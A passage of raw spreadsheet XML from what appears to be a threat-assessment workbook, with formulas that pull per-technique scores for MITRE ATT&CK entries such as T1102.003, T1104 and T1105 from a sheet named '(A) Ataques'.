        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($AJ27=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CR27,"")</f>
        <v>3</v>
      </c>
      <c r="AP27" s="322">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CT27,"")</f>
        <v>2</v>
      </c>
      <c r="AQ27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CV27,"")</f>
        <v>2</v>
      </c>
      <c r="AR27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!$CW27,"")</f>
        <v>1</v>
      </c>
      <c r="AS27" s="287">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($AO27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT27" s="288">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!CX27,"")</f>
        <v>10</v>
      </c>
      <c r="AU27" s="392">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!CZ27,"")</f>
        <v>8</v>
      </c>
      <c r="AV27" s="4">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!DB27,"")</f>
        <v>8</v>
      </c>
      <c r="AW27" s="20">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",'(A) Ataques'!DC27,"")</f>
        <v>2</v>
      </c>
      <c r="AX27" s="331">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($AT27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY27" s="469">
        <f>'(A) Ataques'!LU27+'(A) Ataques'!MA27+'(A) Ataques'!MG27+'(A) Ataques'!MM27+'(A) Ataques'!MS27</f>
        <v>3</v>
      </c>
      <c r="AZ27" s="510">
        <f>'(A) Ataques'!LW27+'(A) Ataques'!MC27+'(A) Ataques'!MI27+'(A) Ataques'!MO27+'(A) Ataques'!MU27</f>
        <v>2</v>
      </c>
      <c r="BA27" s="471">
        <f>'(A) Ataques'!LY27+'(A) Ataques'!ME27+'(A) Ataques'!MK27+'(A) Ataques'!MQ27+'(A) Ataques'!MW27</f>
        <v>1</v>
      </c>
      <c r="BB27" s="471">
        <f>'(A) Ataques'!LQ27</f>
        <v>2</v>
      </c>
      <c r="BC27" s="331">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($AY27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD27" s="469">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!LL27,"")</f>
        <v>4</v>
      </c>
      <c r="BE27" s="510">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!LM27,"")</f>
        <v>3</v>
      </c>
      <c r="BF27" s="471">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!LN27,"")</f>
        <v>1</v>
      </c>
      <c r="BG27" s="471">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!LO27,"")</f>
        <v>1</v>
      </c>
      <c r="BH27" s="471">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!LS27,"")</f>
        <v>2</v>
      </c>
      <c r="BI27" s="331">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($BD27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ27" s="469">
        <f>'(A) Ataques'!OL27+'(A) Ataques'!OR27+'(A) Ataques'!OX27+'(A) Ataques'!PD27+'(A) Ataques'!PJ27</f>
        <v>2</v>
      </c>
      <c r="BK27" s="510">
        <f>'(A) Ataques'!ON27+'(A) Ataques'!OT27+'(A) Ataques'!OZ27+'(A) Ataques'!PF27+'(A) Ataques'!PL27</f>
        <v>2</v>
      </c>
      <c r="BL27" s="471">
        <f>'(A) Ataques'!OP27+'(A) Ataques'!OV27+'(A) Ataques'!PB27+'(A) Ataques'!PH27+'(A) Ataques'!PN27</f>
        <v>2</v>
      </c>
      <c r="BM27" s="495">
        <f>'(A) Ataques'!OH27</f>
        <v>2</v>
      </c>
      <c r="BN27" s="331">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($BJ27=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO27" s="469">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!OC27,"")</f>
        <v>2</v>
      </c>
      <c r="BP27" s="510">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!OD27,"")</f>
        <v>2</v>
      </c>
      <c r="BQ27" s="471">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!OE27,"")</f>
        <v>2</v>
      </c>
      <c r="BR27" s="471">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!OF27,"")</f>
        <v>2</v>
      </c>
      <c r="BS27" s="471">
        <f>IF('(A) Ataques'!$AP27&lt;&gt;"NO",'(A) Ataques'!OJ27,"")</f>
        <v>2</v>
      </c>
      <c r="BT27" s="331">
        <f>IF('(A) Ataques'!$AK27&lt;&gt;"NO",IF($BO27=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A28" s="79">
        <f t="shared" si="0"/>
        <v>26</v>
      </c>
      <c r="B28" s="4">
        <f>IF('(A) Ataques'!AK28&lt;&gt;"NO",'(A) Ataques'!E28,"")</f>
        <v>22</v>
      </c>
      <c r="C28" s="6" t="str">
        <f>IF('(A) Ataques'!AK28&lt;&gt;"NO",IF('(A) Ataques'!M28="","",'(A) Ataques'!M28),"")</f>
        <v>T1102.003-Web_service-one_way_communication</v>
      </c>
      <c r="D28" s="4" t="str">
        <f>IF('(A) Ataques'!AK28&lt;&gt;"NO",'(A) Ataques'!F28,"")</f>
        <v>T1102</v>
      </c>
      <c r="E28" s="286">
        <f>IF('(A) Ataques'!AK28&lt;&gt;"NO",'(A) Ataques'!AQ28,"")</f>
        <v>2</v>
      </c>
      <c r="F28" s="288">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!BB28,"")</f>
        <v>3</v>
      </c>
      <c r="G28" s="392">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!BD28,"")</f>
        <v>3</v>
      </c>
      <c r="H28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!BF28,"")</f>
        <v>3</v>
      </c>
      <c r="I28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!BG28,"")</f>
        <v>1</v>
      </c>
      <c r="J28" s="530">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($F28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BH28,"")</f>
        <v>3</v>
      </c>
      <c r="L28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BJ28,"")</f>
        <v>3</v>
      </c>
      <c r="M28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BL28,"")</f>
        <v>3</v>
      </c>
      <c r="N28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BM28,"")</f>
        <v>1</v>
      </c>
      <c r="O28" s="532">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($K28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P28" s="292">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BN28,"")</f>
        <v>6</v>
      </c>
      <c r="Q28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BP28,"")</f>
        <v>6</v>
      </c>
      <c r="R28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BR28,"")</f>
        <v>6</v>
      </c>
      <c r="S28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BS28,"")</f>
        <v>2</v>
      </c>
      <c r="T28" s="530">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($P28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BT28,"")</f>
        <v>17</v>
      </c>
      <c r="V28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BV28,"")</f>
        <v>4</v>
      </c>
      <c r="W28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BX28,"")</f>
        <v>4</v>
      </c>
      <c r="X28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$BY28,"")</f>
        <v>2</v>
      </c>
      <c r="Y28" s="532">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($U28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z28" s="288">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!BZ28,"")</f>
        <v>8</v>
      </c>
      <c r="AA28" s="392">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!CB28,"")</f>
        <v>6</v>
      </c>
      <c r="AB28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!CD28,"")</f>
        <v>5</v>
      </c>
      <c r="AC28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!CE28,"")</f>
        <v>2</v>
      </c>
      <c r="AD28" s="331">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF(Z28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CF28,"")</f>
        <v>25</v>
      </c>
      <c r="AF28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CH28,"")</f>
        <v>10</v>
      </c>
      <c r="AG28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CJ28,"")</f>
        <v>9</v>
      </c>
      <c r="AH28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CK28,"")</f>
        <v>2</v>
      </c>
      <c r="AI28" s="287">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($AE28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ28" s="292">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CL28,"")</f>
        <v>0</v>
      </c>
      <c r="AK28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CN28,"")</f>
        <v>0</v>
      </c>
      <c r="AL28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CP28,"")</f>
        <v>0</v>
      </c>
      <c r="AM28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CQ28,"")</f>
        <v>0</v>
      </c>
      <c r="AN28" s="331">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($AJ28=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CR28,"")</f>
        <v>0</v>
      </c>
      <c r="AP28" s="322">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CT28,"")</f>
        <v>0</v>
      </c>
      <c r="AQ28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CV28,"")</f>
        <v>0</v>
      </c>
      <c r="AR28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!$CW28,"")</f>
        <v>0</v>
      </c>
      <c r="AS28" s="287">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($AO28=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT28" s="288">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!CX28,"")</f>
        <v>6</v>
      </c>
      <c r="AU28" s="392">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!CZ28,"")</f>
        <v>6</v>
      </c>
      <c r="AV28" s="4">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!DB28,"")</f>
        <v>6</v>
      </c>
      <c r="AW28" s="20">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",'(A) Ataques'!DC28,"")</f>
        <v>2</v>
      </c>
      <c r="AX28" s="331">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($AT28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY28" s="469">
        <f>'(A) Ataques'!LU28+'(A) Ataques'!MA28+'(A) Ataques'!MG28+'(A) Ataques'!MM28+'(A) Ataques'!MS28</f>
        <v>4</v>
      </c>
      <c r="AZ28" s="510">
        <f>'(A) Ataques'!LW28+'(A) Ataques'!MC28+'(A) Ataques'!MI28+'(A) Ataques'!MO28+'(A) Ataques'!MU28</f>
        <v>3</v>
      </c>
      <c r="BA28" s="471">
        <f>'(A) Ataques'!LY28+'(A) Ataques'!ME28+'(A) Ataques'!MK28+'(A) Ataques'!MQ28+'(A) Ataques'!MW28</f>
        <v>3</v>
      </c>
      <c r="BB28" s="471">
        <f>'(A) Ataques'!LQ28</f>
        <v>2</v>
      </c>
      <c r="BC28" s="331">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($AY28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD28" s="469">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!LL28,"")</f>
        <v>6</v>
      </c>
      <c r="BE28" s="510">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!LM28,"")</f>
        <v>5</v>
      </c>
      <c r="BF28" s="471">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!LN28,"")</f>
        <v>3</v>
      </c>
      <c r="BG28" s="471">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!LO28,"")</f>
        <v>2</v>
      </c>
      <c r="BH28" s="471">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!LS28,"")</f>
        <v>2</v>
      </c>
      <c r="BI28" s="331">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($BD28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ28" s="469">
        <f>'(A) Ataques'!OL28+'(A) Ataques'!OR28+'(A) Ataques'!OX28+'(A) Ataques'!PD28+'(A) Ataques'!PJ28</f>
        <v>6</v>
      </c>
      <c r="BK28" s="510">
        <f>'(A) Ataques'!ON28+'(A) Ataques'!OT28+'(A) Ataques'!OZ28+'(A) Ataques'!PF28+'(A) Ataques'!PL28</f>
        <v>3</v>
      </c>
      <c r="BL28" s="471">
        <f>'(A) Ataques'!OP28+'(A) Ataques'!OV28+'(A) Ataques'!PB28+'(A) Ataques'!PH28+'(A) Ataques'!PN28</f>
        <v>3</v>
      </c>
      <c r="BM28" s="495">
        <f>'(A) Ataques'!OH28</f>
        <v>2</v>
      </c>
      <c r="BN28" s="331">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($BJ28=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO28" s="469">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!OC28,"")</f>
        <v>6</v>
      </c>
      <c r="BP28" s="510">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!OD28,"")</f>
        <v>3</v>
      </c>
      <c r="BQ28" s="471">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!OE28,"")</f>
        <v>3</v>
      </c>
      <c r="BR28" s="471">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!OF28,"")</f>
        <v>2</v>
      </c>
      <c r="BS28" s="471">
        <f>IF('(A) Ataques'!$AP28&lt;&gt;"NO",'(A) Ataques'!OJ28,"")</f>
        <v>2</v>
      </c>
      <c r="BT28" s="331">
        <f>IF('(A) Ataques'!$AK28&lt;&gt;"NO",IF($BO28=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A29" s="79">
        <f t="shared" si="0"/>
        <v>27</v>
      </c>
      <c r="B29" s="4">
        <f>IF('(A) Ataques'!AK29&lt;&gt;"NO",'(A) Ataques'!E29,"")</f>
        <v>23</v>
      </c>
      <c r="C29" s="6" t="str">
        <f>IF('(A) Ataques'!AK29&lt;&gt;"NO",IF('(A) Ataques'!M29="","",'(A) Ataques'!M29),"")</f>
        <v>T1104-Multi_stage_channels</v>
      </c>
      <c r="D29" s="4" t="str">
        <f>IF('(A) Ataques'!AK29&lt;&gt;"NO",'(A) Ataques'!F29,"")</f>
        <v>T1104</v>
      </c>
      <c r="E29" s="286">
        <f>IF('(A) Ataques'!AK29&lt;&gt;"NO",'(A) Ataques'!AQ29,"")</f>
        <v>1</v>
      </c>
      <c r="F29" s="288">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!BB29,"")</f>
        <v>0</v>
      </c>
      <c r="G29" s="392">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!BD29,"")</f>
        <v>0</v>
      </c>
      <c r="H29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!BF29,"")</f>
        <v>0</v>
      </c>
      <c r="I29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!BG29,"")</f>
        <v>0</v>
      </c>
      <c r="J29" s="530">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($F29=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BH29,"")</f>
        <v>3</v>
      </c>
      <c r="L29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BJ29,"")</f>
        <v>3</v>
      </c>
      <c r="M29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BL29,"")</f>
        <v>3</v>
      </c>
      <c r="N29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BM29,"")</f>
        <v>1</v>
      </c>
      <c r="O29" s="532">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($K29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P29" s="292">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BN29,"")</f>
        <v>3</v>
      </c>
      <c r="Q29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BP29,"")</f>
        <v>3</v>
      </c>
      <c r="R29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BR29,"")</f>
        <v>3</v>
      </c>
      <c r="S29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BS29,"")</f>
        <v>1</v>
      </c>
      <c r="T29" s="530">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($P29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BT29,"")</f>
        <v>19</v>
      </c>
      <c r="V29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BV29,"")</f>
        <v>1</v>
      </c>
      <c r="W29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BX29,"")</f>
        <v>1</v>
      </c>
      <c r="X29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$BY29,"")</f>
        <v>1</v>
      </c>
      <c r="Y29" s="532">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($U29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z29" s="288">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!BZ29,"")</f>
        <v>7</v>
      </c>
      <c r="AA29" s="392">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!CB29,"")</f>
        <v>5</v>
      </c>
      <c r="AB29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!CD29,"")</f>
        <v>5</v>
      </c>
      <c r="AC29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!CE29,"")</f>
        <v>1</v>
      </c>
      <c r="AD29" s="331">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF(Z29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CF29,"")</f>
        <v>26</v>
      </c>
      <c r="AF29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CH29,"")</f>
        <v>6</v>
      </c>
      <c r="AG29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CJ29,"")</f>
        <v>6</v>
      </c>
      <c r="AH29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CK29,"")</f>
        <v>1</v>
      </c>
      <c r="AI29" s="287">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($AE29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ29" s="292">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CL29,"")</f>
        <v>0</v>
      </c>
      <c r="AK29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CN29,"")</f>
        <v>0</v>
      </c>
      <c r="AL29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CP29,"")</f>
        <v>0</v>
      </c>
      <c r="AM29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CQ29,"")</f>
        <v>0</v>
      </c>
      <c r="AN29" s="331">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($AJ29=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CR29,"")</f>
        <v>0</v>
      </c>
      <c r="AP29" s="322">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CT29,"")</f>
        <v>0</v>
      </c>
      <c r="AQ29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CV29,"")</f>
        <v>0</v>
      </c>
      <c r="AR29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!$CW29,"")</f>
        <v>0</v>
      </c>
      <c r="AS29" s="287">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($AO29=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT29" s="288">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!CX29,"")</f>
        <v>3</v>
      </c>
      <c r="AU29" s="392">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!CZ29,"")</f>
        <v>3</v>
      </c>
      <c r="AV29" s="4">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!DB29,"")</f>
        <v>3</v>
      </c>
      <c r="AW29" s="20">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",'(A) Ataques'!DC29,"")</f>
        <v>1</v>
      </c>
      <c r="AX29" s="331">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($AT29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY29" s="469">
        <f>'(A) Ataques'!LU29+'(A) Ataques'!MA29+'(A) Ataques'!MG29+'(A) Ataques'!MM29+'(A) Ataques'!MS29</f>
        <v>3</v>
      </c>
      <c r="AZ29" s="510">
        <f>'(A) Ataques'!LW29+'(A) Ataques'!MC29+'(A) Ataques'!MI29+'(A) Ataques'!MO29+'(A) Ataques'!MU29</f>
        <v>2</v>
      </c>
      <c r="BA29" s="471">
        <f>'(A) Ataques'!LY29+'(A) Ataques'!ME29+'(A) Ataques'!MK29+'(A) Ataques'!MQ29+'(A) Ataques'!MW29</f>
        <v>2</v>
      </c>
      <c r="BB29" s="471">
        <f>'(A) Ataques'!LQ29</f>
        <v>1</v>
      </c>
      <c r="BC29" s="331">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($AY29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD29" s="469">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!LL29,"")</f>
        <v>4</v>
      </c>
      <c r="BE29" s="510">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!LM29,"")</f>
        <v>3</v>
      </c>
      <c r="BF29" s="471">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!LN29,"")</f>
        <v>2</v>
      </c>
      <c r="BG29" s="471">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!LO29,"")</f>
        <v>1</v>
      </c>
      <c r="BH29" s="471">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!LS29,"")</f>
        <v>1</v>
      </c>
      <c r="BI29" s="331">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($BD29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ29" s="469">
        <f>'(A) Ataques'!OL29+'(A) Ataques'!OR29+'(A) Ataques'!OX29+'(A) Ataques'!PD29+'(A) Ataques'!PJ29</f>
        <v>5</v>
      </c>
      <c r="BK29" s="510">
        <f>'(A) Ataques'!ON29+'(A) Ataques'!OT29+'(A) Ataques'!OZ29+'(A) Ataques'!PF29+'(A) Ataques'!PL29</f>
        <v>2</v>
      </c>
      <c r="BL29" s="471">
        <f>'(A) Ataques'!OP29+'(A) Ataques'!OV29+'(A) Ataques'!PB29+'(A) Ataques'!PH29+'(A) Ataques'!PN29</f>
        <v>2</v>
      </c>
      <c r="BM29" s="495">
        <f>'(A) Ataques'!OH29</f>
        <v>1</v>
      </c>
      <c r="BN29" s="331">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($BJ29=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO29" s="469">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!OC29,"")</f>
        <v>5</v>
      </c>
      <c r="BP29" s="510">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!OD29,"")</f>
        <v>2</v>
      </c>
      <c r="BQ29" s="471">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!OE29,"")</f>
        <v>2</v>
      </c>
      <c r="BR29" s="471">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!OF29,"")</f>
        <v>1</v>
      </c>
      <c r="BS29" s="471">
        <f>IF('(A) Ataques'!$AP29&lt;&gt;"NO",'(A) Ataques'!OJ29,"")</f>
        <v>1</v>
      </c>
      <c r="BT29" s="331">
        <f>IF('(A) Ataques'!$AK29&lt;&gt;"NO",IF($BO29=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A30" s="79">
        <f t="shared" si="0"/>
        <v>28</v>
      </c>
      <c r="B30" s="4">
        <f>IF('(A) Ataques'!AK30&lt;&gt;"NO",'(A) Ataques'!E30,"")</f>
        <v>24</v>
      </c>
      <c r="C30" s="6" t="str">
        <f>IF('(A) Ataques'!AK30&lt;&gt;"NO",IF('(A) Ataques'!M30="","",'(A) Ataques'!M30),"")</f>
        <v>T1105-Ingress_Tool_Transfer</v>
      </c>
      <c r="D30" s="4" t="str">
        <f>IF('(A) Ataques'!AK30&lt;&gt;"NO",'(A) Ataques'!F30,"")</f>
        <v>T1105</v>
      </c>
      <c r="E30" s="286">
        <f>IF('(A) Ataques'!AK30&lt;&gt;"NO",'(A) Ataques'!AQ30,"")</f>
        <v>7</v>
      </c>
      <c r="F30" s="288">
